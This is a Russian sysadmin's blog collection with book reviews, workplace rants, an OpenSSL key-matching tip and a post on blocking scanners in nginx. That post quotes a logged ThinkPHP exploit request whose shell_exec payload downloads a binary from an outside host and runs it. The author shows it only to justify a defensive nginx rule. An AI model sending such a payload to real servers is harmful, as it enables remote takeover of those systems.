manual.txt







Приветствую!




sittin' on yer cisco switch | floodin' yer packetz


Меня зовут Денис, и я системный инженер/администратор/DevOps.
Этот ЖЖ создан в качестве рабочего блокнота для (около)айтишных записей и обмена опытом с коллегами.
Во-первых, для противодействия собственному склерозу, а во-вторых, для приведения мыслей в порядок.

Чему здесь быть:
- рабочие заметки
- обмен опытом
- howto’шки
- хаки разной степени грязности
- костыли разной степени кривости
- вопросы к читателям
- ссылки
- живое общение
- профессиональный, малопонятный большинству юмор
- двухминутки ненависти
- книги

Твиттер имеется:
https://twitter.com/hvostat

Инстаграм наличествует:
http://instagram.com/hvostat

Основные теги:

Windows, Windows Server - Windows десктопный и серверный.

juniper, JunOS - всё про Juniper вообще и JunOS в частности.

linux, CentOS, Debian - красноглазое красноглазие, пингвины, бубны оптом.

утипусечка - железо. Я очень люблю работать с разными электронными штуковинами, и с удовольствием об этом напишу.

софт - всё, что не железо.

бНОПНЯ - вопрос к аудитории.

планета Черезжопия, это не надо - иллюстрация того, как делать не надо.

рекомендация - посоветую, какое железо или софт лучше использовать, исходя из собственного опыта.

юмор - чего-нибудь похихикать.

книги - микро/нанобзоры прочитанных книг.

жизненное - о реальной жизни.

hvostat.log - про вашего покорного слугу.

Правовая оговорка и письменный отказ от ответственности:
Все упоминаемые в Блоге торговые марки и товарные знаки принадлежат их владельцам.
Автор не несет ответственности и не предоставляет гарантий в связи с публикацией фактов, данных, результатов и другой информации в данном Блоге.
Все инструкции и/или гайдлайны, написанные в данном Блоге НЕ ЯВЛЯЮТСЯ руководством и/или рекомендацией к действию.
Автор не несет ответственности за возможное нанесение ущерба любого рода, прямого либо косвенного, которое произошло вследствие выполнения инструкций и/или гайдлайнов.
Все истории, места, события и герои вымышлены. Любые совпадения с реальными личностями и событиями случайны.


//Да, на фотографии - моя кошка. Зовут Жыслая. И на юзерпике - тоже она. Язычок - настоящий, гарнитуру - прифотошопил.
//Почему Хвостат Хвостатыч? Потому что в своё время я таки был хвостат.

__

"О книгах и критериях"


(автор неизвестен)


Прошлый псто про книги вызвал живую дискуссию а также вопсро от Серёги: «Вот ты сказал, что для тебя сюжет был примитивный и рельсовый, а что же тогда не примитивный и не рельсовый?»

Не скажу, что я прямо-таки книжный гурман и филолог-литературовед, но есть два очень простых и достаточно объективных критерия, чтобы понять, хорошая ли книга (роман) или нет.

Продолжу наш выпуск литературной газеты.

Критерий первый: «нелёгкая задача».
Автор помещает героя в сложные условия и на протяжении книги, с приключениями и перипетиями из этих условий выводит.
Пример экспромтом из головы:
Звёздолёт терпит крушение на некой планете. Задача: с этой планеты улететь. Но это НЕЛЕГАЯ ЗАДАЧА, потому что в процессе аварии серьёзно поврежден двигатель(гидравлика, боротовой компьютер - нужное подчеркнуть) и лётчик должен пройти весь этап от каменного века до наших дней, чтобы своими руками сделать замену/аналог.
(Кстати, никто не вспомнит ничего подобного? Я бы почитал с удовольствием. )

Критерий второй: «дуга характера».
Иначе говоря – изменение характера, в частности, переоценка ценностей главного героя в процессе сильных переживаний и осознания совершенных ошибок.
Пример экспромтом из головы, на этот раз подлиннее:
Жил-был могущественный и злой колдун. Он жил высокой черной башне и терроризировал окрестные земли.
А если ему не выдавали в деревнях самой вкусной еды и самых красивых девушек, то он деревни сжигал, а жителей превращал в жаб.
И вот однажды, он пришел в небольшую деревню, где ему отказали в его желаниях. И он сжег деревню, злобно хохоча.
Далее, картина: стоит колдун, на фоне горит деревня. Кричат люди. И к нему идёт маленькая девочка, вся чумазая от пепла. Подходит и говорит:
- Ты можешь меня убить. Но ты НИКОГДА не сможешь меня напугать.
Колдун осознал всю мерзость содеянного, бросил посох и зарыдал от отвращения к самому себе.
Остаток жизни он провёл в попытках исправить свои страшные деяния, помогая людям.
А девочка стала королевой той земли и привела её к богатству и процветанию.
(12 строк, а уже идея для неплохой фентезятины, не находите?)

Разумеется, чаще всего мы видим не отдельные два вышеописанных критерия, а их сочетания.

Далее, что не является «рельсовым сюжетом», опять же утрированно просто:
Начинаем сюжетную линию №1, вводим главного героя.
Потом начинаем сюжетную линию №2, вводим, например отрицательного героя.
Потом начинаем сюжетную линию №3, вводим, например, друга/подругу главного героя.
Подчеркну: линии совершенно не обязательно должны идти параллельно по временнОй шкале.
В идеальном мире, эти три линии должны сойтись в кульминации, где главный герой с трудом(см. «нелегкая задача») победит злодея и чего-нибудь важное осознает (см. «дуга характера»).

Вот как-то так.

А теперь КОНТРпример, утрированно:
Умный, красивый, сильный и везучий главный герой (единственное действующее лицо в книге), который побеждает врагов пачками, у которого в каждых кустах по, минимум, три рояля, и, конечно же, он ебет за раз не менее 10 сексапильных самок.

И еще тезис. ИМХО, сама по себе ИДЕЯ некого мира/вселенной стоит НОЛЬ. Если автор - сраный графоман, то ничего кроме занудной бредятины и/или приторного мерисьюшинчества оттуда извлечь он не сможет.

Думаю, моя мысль и литературные предпочтения, теперь предельно ясны.

Напомню, прочитать про книги и мои мысли по поводу можно по ссылке:
https://hvostat-hvostat.livejournal.com/tag/книги

__

"Книги / Книги / 01.20"

Первый псто в новом году будет про книги.

Вильям Сибрук - "Роберт Вуд" - отлично. Книга про жизнь того самого Вуда, который открыл и исследовал оптический резонанс а также изобрёл ультрафиолетовую лампу, названную его именем.
Оператор наведения - очаровательная walsk. Большое спасибо!

Дмитрий Чернышев - "Как люди думают" - хорошо/отлично. Анализ основных приёмов работы человеческого разума с наглядными примерами.

Эдуард Овечкин - "Акулы из стали", "Акулы из стали: туман", "Акулы из стали: аврал". - хорошо/отлично. Записки подводника, который служил на самой большой подводной лодке - 941-го проекта.

Паоло Бачигалупи - "Заводная" - [без оценки] - не дочитал. Ну не смог я поверить в механический мир глубокого будущего с часовыми пружинами вместо аккумуляторов и мамонтами вместо электродвигателей.

Грег Иган - "Диаспора" - [без оценки] - не дочитал. Не смог продраться сквозь язык.

Джозеф Хеллер - "Уловка 22" - [без оценки] - не дочитал. Книга про пилота-бомбардировщика американских ВВС на средиземноморском театре боевых действий в 2-ю мировую, а также про бюрократию и прочий армейский маразм.

Алексей Щербаков - "Летчики, самолеты, испытания" - хорошо/отлично. Автобиографическая книга лётчика-испытателя со стажем более 30-ти лет. Кстати, написана очень доступным языком - кому интересна авиация вообще и работа лётчика-испытателя в частности - рекомендую.

Сергей Лукьяненко - "Лабиринты отражений" - средне. Идея отличная - виртуальная реальность, неотличимая от реальности настоящей. Вачовски одобряют. Однако, книга совершенно примитивная и линейная. Возможно, я уже слишком взрослый для таких книг и лет 15 назад мне бы "зашло". Но это не точно.
Оператор наведения - мудрейший klink0v. Спасибо!

Сергей Лукьяненко - "Спектр" - средне. Увы, книгу мне заспойлерили, поэтому интересность сразу упала процентов на 30. Тем не менее - ИМХО очень средний роман, несмотря на глобальные масштабы, интересные вопросы и острые проблемы. Так же, как и в Л.О. - идея отличная, но сюжет совершенно линейный и рельсовый + скомкан финал.
Оператор наведения - также klink0v. Еще раз спасибо!

Отдельно еще мысль по Лукьяненко - обе книги оставили какое-то мерзопакостное послевкусие, это чрезвычайно сложно описать. Попытаюсь сформулировать.
Вот читаешь, например, Стругацких, Лема, Бредбери - да вообще кого угодно из фантастики - перед глазами словно кинофильм. С детальными пейзажами, живыми актёрами, живыми диалогами. А здесь такое ощущение, что перед глазами - какой-то голимый комикс для школьников. Бонусом - сквозь текст сквозит шовинизм автора и его огромное ЧСВ.

__

"Традиционный новогодний псто"

Мои мысли по поводу нового года легко умещаются в два предложения:
"Больше всего на свете я желаю окончания вот этого предновогоднего ада из пробок, льда, снега, людей, звонков и писем, кавардака на работе.

Когда успело случиться так, что вместо всех этих "водки, хвои и трески, мандаринов, корицы и яблок " я чувствую себя сидящим в воющей центрифуге, и мое единственное желание - вылезти из нее, использовать гигиенический пакет, и, шатаясь, побрести прочь, в объятья тишины и полутемных комнат." ©

_

"Это всё дурной сон"


(лично мне совсем не смешно)


Раньше я мечтал работать в крупной™ международной™ компании™.
Чтобы в небоскребе из стекла и металла. И не менее нескольких тысяч человек сотрудников.
Чтобы прям все серьёзно-серьёзно. Как перетонит.

Поработал. Теперь меня от одного упоминания КМК - тошнит и бурно рвёт.

Я смотрю на происходящее, и мне кажется что я вижу опиумный сон.
Хотя, это значительно больше похоже на мухоморные кошмары.
50 человек делают работу пол года, которую должны делать 5 и за два месяца.
Но, все занятыыыы - ПИЗДЕЦ КАК.
Митинги, встречи, письма, конференции.
Перелеты иностранцев, отчёты, стратегии, планы.
РЫГламенты, согласования...
Пафосный обратный отчёт до дня запуска ни кому не понятной (да и особо не нужной) хуйни.
Куча красивых иностранных слов, моднейший офис.

Думаю, психиатрам и психологам было бы, вообще, довольно интересно изучить этот феномен.
Там в целом подход следующий:
- топ-менеджмент даёт стратегическую задачу.
- после этого каждый, кому её поручили, любой ценой старается её ПЕРЕПОРУЧИТЬ.
- п.2. повторяется N раз.
- последний в звене отдаёт задачу/подзадачу на аутсорс.

Охуенно же! В итоге - армия долбоёбов, которая только и делает, что проводит митинги и скайпколлы, согласования и совещания.
Владение информацией: нулевое. По ЛЮБОМУ вопросу - "нам необходимо уточнить".
Внедрение разработок и решение вопросов в целом - со скоростью больной черепахи.
Просираются все мыслимые и немыслимые дедлайны.
В случае факапа: никто не виноват (в крайнем случае - аутсорсеры), потому что никто и никогда не отследит и не распутает весь этот клубок поручений и перепоручений.
Бонусом: КОНСКИЙ перерасход денег.

Темпы работы поражают даже самые смелые предположения и фантазии.

Поменять адрес на роутере - две недели.
(И это еще хорошо. Это - ОТЛИЧНО.)

Недавно.
Запросил х509 сертификат для вебсервера.
Прошло две недели: прислали сертификат и еще всё цепочку. Молодцы.
Говорю, спасибо, но маловато - дайте еще закрытый ключ.
Заткнулись на МЕСЯЦ.
Присылают письмо, в нем cert, pkcs7 и key.
О, -думаю, - чудо!
Прогоняю openssl-m. Ошибка.
Смотрю на содержимое key.
Ну да, так и есть это не ключ. Это - req - запрос на сертификат.
Молодцы! Браво!

Средний темп общения - один вопрос/ответ В РАБОЧИЙ ДЕНЬ.

Согласовать простой протокол обмена REST JSON API - год.
ГОД БЛЯДЬ!!!!!!!11

Нет, мы не полетим на Марс. Мы умрём, сука, здесь, на Земле.
От старческого маразма.

_

"15 декабря"

Чем хорош, казалось бы, обычный день - 15-е декабря?

Ну, кроме того, что это - международный день чая.

А хорош он тем, что в любой нормальной™ организации™ именно 15-го декабря наступает строжайший мораторий на внесение изменений и/или развёртывание новых компонентов в продакшн.

Инженеры пишут документацию, рисуют карты сетей/сервисов, правят минорные баги- чтобы новый год отпраздновать совершенно спокойно и полностью расслаблено.
(А не чинить ВНЕЗАПНО упавший прод с горящей сракой и полупьяными коллегами, которые разъехались по отпускам и теперь до них хер дозвонишься)

__

"Чей ключ?"

Задача:
Проверить принадлежность закрытого ключа сертификату и/или запросу на сертификат.

Решение:
Воспользоваться OpenSSL.

Для RSA вводим следующее:
openssl rsa -noout -modulus -in server.key | openssl sha1
openssl x509 -noout -modulus -in server.crt | openssl sha1
openssl req -noout -modulus -in server.csr | openssl sha1

Если результирующий hash совпадает с hash-ом ключа - значит закрытый ключ "от этого сертификата".

Для ECDSA - вводим немного другое:
openssl x509 -pubkey -in server.crt -noout | openssl sha1
openssl pkey -pubout -in server.key | openssl sha1

__

"Наперекор советам"

Мой кармический брат Стас написал псто, который навёл меня на некоторые мысли по смежной теме.

Так вот.
Есть у меня некоторая способность к стратегии и "виденью сверху".
Попробую пояснить.

Подходит ко мне человек и говорит:
- Дэн, вот есть задача/проблема x, подскажи, как её решить?
- Без проблем. Берешь штырне, покупаешь ырчне, потом всё это соединяешь и вуаля.
- Ой, нет! Это сложно/дорого/долго/неудобно/"никто не будет этим заниматься"/не сейчас/может быть потом/я подумаю. Спасибо!
(пожимаю плечами) - Да не за что...

Далее в 100% случаев происходит следующее: "человек идёт и ломает дрова вагонами. ВАГОНАМИ, Карл! Нанося ущерб тебе, себе, ему, тому_парню® и окружающей среде. Попутно испытывая морально-нравственные страдания™ в количествах." ©

Но самое интересное не это. После того, как человек набивал синяки и шишки, харкал кровью и не спал ночами, ОН ВСЁ РАВНО ПРИХОДИТ К ТОМУ РЕШЕНИЮ, КОТОРОЕ Я ПОДСКАЗЫВАЛ ИЗНАЧАЛЬНО!!!

"Блин, вот что это? Как это называется? Отсутствие мозгов? Склонность к мазохизму? Комплексы? Упрямство? "Назло мамке отморожу уши?" Гипертрофированная самостоятельность, перерастающая в самонадеянность? Инфантильность? Стремление кому-то что-то доказать? Недоверие? Боязнь получить отказ? [Впишите свой вариант.]" ©

Дополнение от dizel_by:
Второй вариант по частоте - это сделать НЕ ТАК, как я говорил, сделать по своему, в итоге - "наломать дров", а потом спрашивать "совет второго порядка": как теперь ЭТО починить.

Или даже еще круче. «Вот он мне посоветовал, но это было мне сложно/неудобно, поэтому я КОЕ-ЧТО сделал иначе, а теперь полный пиздец. Пусть он мне компенсирует»

Сразу подчеркну - речь идёт не только об IT.

Резюме от murz0id:
"Не мешай дуракам делать глупости, они от этого злятся."


__

"Мамкины хакеры идут на хер"

Проблема:
Мамкины хакеры постоянно ломятся на сервер под управлением nginx и пытаются вызвать там говно, подобное:
GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget httd://pidary.gnoynye/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0" "-"


Решение:
Добавить соответствующем месте conf файла следующие строки:

location ~* ^.*\.php.*$ {
return 444;
}

__

* * *

Иногда я покупаю какие-нибудь железки на "барахолке".
Порой бывает забавно.

Но сегодняшний диалог, что называется "сделал мой день":
- Здрасьте, это Вася?
- Да.
- Я вижу ваше объявление, вы еще продаёте сервер NNN модели XXX?
- Да.
- А можно вас попросить фото для оценки?
- Конечно, дайте пять минут и пришлю.
Проходит пять минут.
И я наблюдаю вот это:


(кликабельно)

- Вы знаете... Я, ПОЖАЛУЙ, ВОЗДЕРЖУСЬ ОТ ПОКУПКИ.

__